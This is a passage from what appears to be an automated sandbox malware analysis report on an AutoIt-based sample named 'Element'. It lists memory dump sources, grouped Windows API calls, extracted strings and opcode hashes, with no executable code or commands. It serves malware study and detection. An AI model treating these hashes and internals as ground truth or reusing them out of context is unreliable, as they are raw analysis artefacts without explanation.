                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-2659433951
                    • Opcode ID: 97a1d40f626d07f8b6b8daa48bc59cc996610198c86794b7ab60cb7639f08fb7
                    • Instruction ID: 351d1bdf9d434bca90f6a8c5fc2cd6ac2a8ef34169b028c4008da88909d0c9c3
                    • Opcode Fuzzy Hash: 97a1d40f626d07f8b6b8daa48bc59cc996610198c86794b7ab60cb7639f08fb7
                    • Instruction Fuzzy Hash: 5F315C72A08B819AE740CF61EC883A837B4FB44B5AF140179CA9D97B56DF7CD558CB80
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                    • String ID:
                    • API String ID: 2672075419-0
                    • Opcode ID: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                    • Instruction ID: c00c0077503c1e86ddc7e63ede37f6a0fd9c961ef1bf66419fb13546a61c283c
                    • Opcode Fuzzy Hash: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                    • Instruction Fuzzy Hash: 06918E76B096928AEB508F65DC882BD23B5FB84F9AF140075DE8DC7786CF38E8559700
                    APIs
                      • Part of subcall function 00007FF6C587780C: CreateFileW.KERNEL32 ref: 00007FF6C5877876
                      • Part of subcall function 00007FF6C58941D0: GetCurrentDirectoryW.KERNEL32(?,00007FF6C58799C7), ref: 00007FF6C58941EC
                      • Part of subcall function 00007FF6C5875A50: GetFullPathNameW.KERNEL32(?,00007FF6C5875A3D,?,00007FF6C5874C50,?,?,?,00007FF6C587109E), ref: 00007FF6C5875A7B
                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF6C5879A60
                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF6C5879BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 2207129308-3738523708
                    • Opcode ID: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                    • Instruction ID: 9e3f6a1741f1c1116622acce21fa296070c5a28e188204402d180bac835aa474
                    • Opcode Fuzzy Hash: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                    • Instruction Fuzzy Hash: BB129322B1A6A295EB10EF20DC401FD6764FB85B95F800132FACE87696DF7CD945CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: DestroySendStringUninitializeUnregisterWindow
                    • String ID: close all
                    • API String ID: 1992507300-3243417748
                    • Opcode ID: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                    • Instruction ID: cb661c5b640ec5c4491eacc963c5a245a3b355e386eb518dc52aa21fb392eec2
                    • Opcode Fuzzy Hash: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                    • Instruction Fuzzy Hash: 1ED12F21B0BA6281EE54EF16CD6027C2364BF94F86F544471EB9E97292DF3CDC628B44
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                    • API String ID: 0-1765764032
                    • Opcode ID: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                    • Instruction ID: c8277ee7608da61ed17358b02d8a29a26291b3519c448deae2251832f4819938
                    • Opcode Fuzzy Hash: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                    • Instruction Fuzzy Hash: 57A16B36B08BC286EB208F65E8402AD77A0FB88F99F444576DA8D87B56DF3CD945C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: shared_ptr$ErrorLast$HandleModule
                    • String ID: (
                    • API String ID: 3818824616-3887548279
                    • Opcode ID: 6df94605af3172dd56dabb8239c89d9470822726eac165c75e045d107a37431c
                    • Instruction ID: e2ddf685bc13307b9849c208dc585d8576722deb41546acc0105e8172e4c5916
                    • Opcode Fuzzy Hash: 6df94605af3172dd56dabb8239c89d9470822726eac165c75e045d107a37431c
                    • Instruction Fuzzy Hash: AF512F323296C456EB90D765F8347DBA7E2E389780F805525EA8E43B99EE7DC5448B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateObjectStockwcscat
                    • String ID: -----$SysListView32
                    • API String ID: 2361508679-3975388722
                    • Opcode ID: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
                    • Instruction ID: a2615abfd6581d673b837821ed3bed1e10d05a7eb6a586b25a01c5c94ae6f8f7
                    • Opcode Fuzzy Hash: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
                    • Instruction Fuzzy Hash: F751CF32A04BD19AE720CF25EC446DA73A5FB48B85F40413ADE8D87B5ADF38D955CB80
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                    • API String ID: 2943138195-2239912363
                    • Opcode ID: b8502d753cb8fbdb21851ae16ee27728c038d3baf5513044a2cf0921f7ed30ea
                    • Instruction ID: 72dada46185e86f6f9dce62759513eaee909362b23d21c823a9821c33ae9f908
                    • Opcode Fuzzy Hash: b8502d753cb8fbdb21851ae16ee27728c038d3baf5513044a2cf0921f7ed30ea
                    • Instruction Fuzzy Hash: 09515C72A10B99B8FB11DF64E8B83EC77B4B728758F444116CE4952B99DB3C81C6CB50
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: AutoIt v3
                    • API String ID: 423443420-1704141276
                    • Opcode ID: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
                    • Instruction ID: 185f58d6df650db6411f3eb6d0db1ea025e3a2b38745b24aefa09cbc4f0bde10
                    • Opcode Fuzzy Hash: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
                    • Instruction Fuzzy Hash: 8F311976A08B8286E750CF51EC8876933B4FB84B5AF040179C9CD97B16EF7D9858C780
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                    • String ID:
                    • API String ID: 1617910340-0
                    • Opcode ID: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                    • Instruction ID: 92b03cfaf3b5905ff06619a097c5751efbf986db540ec64ea1bb4568539b869d
                    • Opcode Fuzzy Hash: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                    • Instruction Fuzzy Hash: DEC1CE32B29A518AEB14DF65DC853AC3761EB49BA9F005235DE6E9B7D5CF38E811C300
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                    • String ID:
                    • API String ID: 3210457359-0
                    • Opcode ID: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                    • Instruction ID: d4dc72d12e761d5959af07392dbddaa9ff321588202cbd5ccad826dd294f651f
                    • Opcode Fuzzy Hash: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                    • Instruction Fuzzy Hash: AC61CD35A082E396F7349E258C417BA2755BFA0FA6F1084B1DA9D966E7CF3CEC409700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                    • String ID: ?
                    • API String ID: 500310315-1684325040
                    • Opcode ID: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                    • Instruction ID: 9502fc3d954e57a0665bf1b184e2d42b2db22ba6f2da82908ff60cec57fb4794
                    • Opcode Fuzzy Hash: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                    • Instruction Fuzzy Hash: DB61A272A196A286E750EF21EC401A977A8FF44F96F841235E98EC7A95DF3CED41C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 3721556410-2107944366
                    • Opcode ID: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                    • Instruction ID: ad6d8c18f9be1414b8d0a3c517d04d131ef432aaf6a65ce39dee4c643e4b6da7
                    • Opcode Fuzzy Hash: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                    • Instruction Fuzzy Hash: 8261CB76A14AA285EB40DF61EC945ED3770FB44F9AF400172ED8D97AA6CF38E949C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                    • String ID: 2$P
                    • API String ID: 93392585-1110268094
                    • Opcode ID: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                    • Instruction ID: 91389447e9f203dc5ab3a304b29041dcec536fde1503d5f1adcb00a356bd16ed
                    • Opcode Fuzzy Hash: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                    • Instruction Fuzzy Hash: 58510136E0666289F7248F219C482BD37B5EB42F5AF244035CAAE97695CFBCD842C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: AddressFreeLibraryProc
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3013587201-537541572
                    • Opcode ID: 25172eaa31ba3ca038662f7f5cf4ede4da3b633a465d710dd9bb12d489b4e0f4
                    • Instruction ID: 4a317c5059dbba4fcb51eb319c55abfc874e79225dc5c10c792080185a4c4d16
                    • Opcode Fuzzy Hash: 25172eaa31ba3ca038662f7f5cf4ede4da3b633a465d710dd9bb12d489b4e0f4
                    • Instruction Fuzzy Hash: 1F41D275311A00A1FB26DF16A8387E623D5FB68BA1F4841259D199B794FF38C4C7C300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: IconLoad_invalid_parameter_noinfo
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 4060274358-404129466
                    • Opcode ID: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                    • Instruction ID: 62c99a4cf4939a9723efd540ca5cd60a77f077516e62e97138503d0a413a13be
                    • Opcode Fuzzy Hash: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                    • Instruction Fuzzy Hash: A0216029B0E79381FB549F16AD0017A62A1AF84F8BF444031DD8D867E6EFBCEC408680
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Messagewprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 4051287042-3128320259
                    • Opcode ID: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                    • Instruction ID: 59138784724c96a2e408d23fdfc36ece7f92215a4988444b0b8ffd9d0d3ef355
                    • Opcode Fuzzy Hash: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                    • Instruction Fuzzy Hash: 28113075A19BC191D7348F10FC45BEA2260FB48B45F84143AD68E86A5ADF7CC945C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    • Opcode ID: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                    • Instruction ID: 5749327d748cde6fdc97bea928c8bbfedbf271fb24d96f7ba05d1f749262ecb8
                    • Opcode Fuzzy Hash: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                    • Instruction Fuzzy Hash: 55A10272B186C342EB688F259D4873977A0FB44F86F105075DA8A87AA2DF3CEC64C741
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                    • Instruction ID: f0837dcedb0ee1270ed3144aba450a54ea63de30ece828ff8d75a3479cf91616
                    • Opcode Fuzzy Hash: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                    • Instruction Fuzzy Hash: CE518131A0E29389F7659F399C5877D2695BF86F4BF284075C58EC62E6CE2CAC84D200
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                    • Instruction ID: 81e1935ec004b584cb7ebbef2a21ec777712fc8932464183b5b7c0e3a1b1dff0
                    • Opcode Fuzzy Hash: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
